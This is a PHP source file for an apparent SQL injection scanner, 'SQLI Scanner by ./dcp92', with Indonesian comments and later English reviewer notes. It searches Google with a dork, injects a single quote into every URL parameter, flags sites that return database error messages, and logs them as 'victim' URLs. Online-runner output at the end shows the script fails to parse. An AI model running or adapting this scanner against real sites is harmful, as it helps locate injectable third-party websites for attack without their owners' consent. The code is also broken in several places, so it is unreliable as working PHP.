<?php
**/Membuat Dan menentukan error query :D**/
// Substrings taken from verbose database and runtime error messages (MySQL, PHP,
// Microsoft JET/Access via ODBC, OLE DB providers for SQL Server and Oracle).
// sqli() below joins this list with "|" and matches it case-insensitively against
// a fetched response body.
// Defender note: any application that returns one of these strings to a client is
// disclosing backend error detail. Disable error display in production, return a
// generic error page, and use parameterized queries so a stray quote cannot reach
// the SQL parser.
$error[] = 'You have an error in your SQL'; $error[] = 'supplied argument is not a valid MySQL result resource in';
$error[] = 'Division by zero in';
$error[] = 'Call to a member function';
$error[] = 'Microsoft JET Database';
$error[] = 'ODBC Microsoft Access Driver'; $error[] = 'Microsoft OLE DB Provider for SQL Server';
$error[] = 'Unclosed quotation mark';
$error[] = 'Microsoft OLE DB Provider for Oracle';
$error[] = 'Incorrect syntax near';
$error[] = 'SQL query failed';
**/note: pada variable $error[] kalian bisa menambahkan error string lagi sesuka hati kalian**/
**/Membuat Function Let it by (tampilkan berdasarkan a-z pada web victim)**/
/**
 * Pushes pending output to the browser: ob_flush() sends PHP's output buffer,
 * flush() then flushes the system write buffers. Called after each echoed
 * result so the page fills in progressively instead of at script end.
 */
function letItBy(){ ob_flush(); flush(); }
**/membuat function scan*/
/**
 * Requests one page of web-search results for $query and returns the decoded
 * result entries.
 *
 * @param mixed $query search text; it is passed through urlencode() into the URL
 * @param int   $page  result page index; the start offset is $page * 8
 * @return array|false the 'results' list from the decoded response, or false when
 *                     the response status is not '200' or the list is empty
 *
 * Terminates the script with die() when the decoded response has no
 * 'responseStatus' key (for example when the fetch failed or the body was not JSON).
 */
function scan($query, $page=1)
{
$resultPerPage=8;
$start = $page*$resultPerPage;
// NOTE(review): the "rsz" placeholder below is written with a space inside the
// braces, so as it stands it does not name $resultPerPage.
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPer Page}&start={$start}&q=" . urlencode($query);
// Second argument true makes http_get() sleep one second before the request;
// json_decode(..., true) yields associative arrays.
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
// Loose comparison against the string '200'.
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
// The request URL is echoed into the HTML error output as-is.
die('The function <b>' . __FUNCTION__ . '</b> Kill me <br>' . $url );
}
**/membuat function http_get**/
/**
 * Fetches $url with cURL and returns the response body.
 *
 * @param string $url      address to request
 * @param bool   $safemode when strictly true, sleep one second before the request
 * @return string|false body returned by curl_exec(), or false on failure
 */
function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
// Return the body as a string instead of printing it.
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
// Only the connect phase is bounded (10 s); no overall transfer timeout is set.
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
// Redirects are followed; no redirect limit or protocol restriction is set here.
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
// Response headers are not included in the returned string.
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
// NOTE(review): unreachable after the return above, and called without the handle.
curl_close();
}
**/membuat function sqli**/
/**
 * Requests a modified copy of $url and reports whether the response body
 * contains any of the strings collected in the global $error list.
 *
 * @param string $url address to test
 * @return int|false result of preg_match(): 1 on a match, 0 on none, false on a regex error
 *
 * Defender note: the request this produces has a single quote placed directly
 * after every "=" in the URL. That shape is easy to flag in access logs or a WAF
 * rule, and it only yields a signal when the application echoes database errors
 * back to the client.
 */
function sqli($url) {
// Every "=" in the URL becomes "='" before the fetch.
$data = http_get(str_replace("=", "='", $url));
// The entries are joined as regex alternatives without preg_quote().
$errors = implode("|", $GLOBALS['error']);
// As written, the pattern string spans two lines, so a line break sits between
// the last alternative and the closing "#" delimiter; "i" makes it case-insensitive.
return preg_match("#{$errors}
#i", $data);
}
?>
<!-- create the HTML page and the submit form -->
<html>
<head>
<title>SQLI Scanner by ./dcp92</title>
</head>
<body>
<center>please enter dork:<br>
<form method="post" name="pageform" action="" onsubmit="return validate(this);">
<input type="text" size="25" id="dcp92" name="sqli" value="<?php echo (isset($_POST['sqli']
{0})) ? htmlentities($_POST['sqli']) : 'inurl:/page.php?id='; ?>" />
<input type="submit" value="Start Scanning">
</form>
</center>
</body>
</html>
<?php
// Form handler: runs only when the posted 'sqli' field has at least one character
// (the {0} string-offset form used for that test is legacy syntax).
// NOTE(review): the block opened on this line has no matching closing brace before
// the closing PHP tag below.
if(isset($_POST['sqli']{0})){
echo "Scanning has been started, please wait a few minutes";
// Walk up to ten result pages for the submitted search text.
for($googlePage = 1; $googlePage <= 10; $googlePage++){
$googleResult = scan($_POST['sqli'], $googlePage);
**/menampilkan jika scan sudah selesai**/
// scan() returned false (non-200 status or no results): report it and stop paging.
if(!$googleResult){
echo '<font color="red">google say: I not have more result. so, scanning done</font> ';
break;
}
for($victim = 0; $victim < sizeof($googleResult); $victim++){
**/menampilkan jika sukses**/
if(sqli($googleResult[$victim]['unescapedUrl'])){
// No FILE_APPEND flag is passed, so each write replaces the previous contents of sqli.txt.
file_put_contents("sqli.txt", "{$googleResult[$victim]['unescapedUrl']}\n");
} else {
**/menampilkan jika gagal**/
// The URL and title come from the remote search response and are echoed into the
// page without htmlspecialchars(); remote data therefore reaches the HTML unescaped.
echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult
[$victim]['titleNoFormatting']}</a>\n";
letItBy();
}
}
}
?>
- Output for 4.4.2 - 4.4.9, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.34
- Parse error: syntax error, unexpected '*' in /in/lC4FW on line 2
Process exited with code 255. - Output for 4.3.0 - 4.3.1, 4.3.5 - 4.3.11, 4.4.0 - 4.4.1, 5.0.0 - 5.0.5
- Parse error: parse error, unexpected '*' in /in/lC4FW on line 2
Process exited with code 255. - Output for 4.3.2 - 4.3.4
- Parse error: parse error in /in/lC4FW on line 2
Process exited with code 255.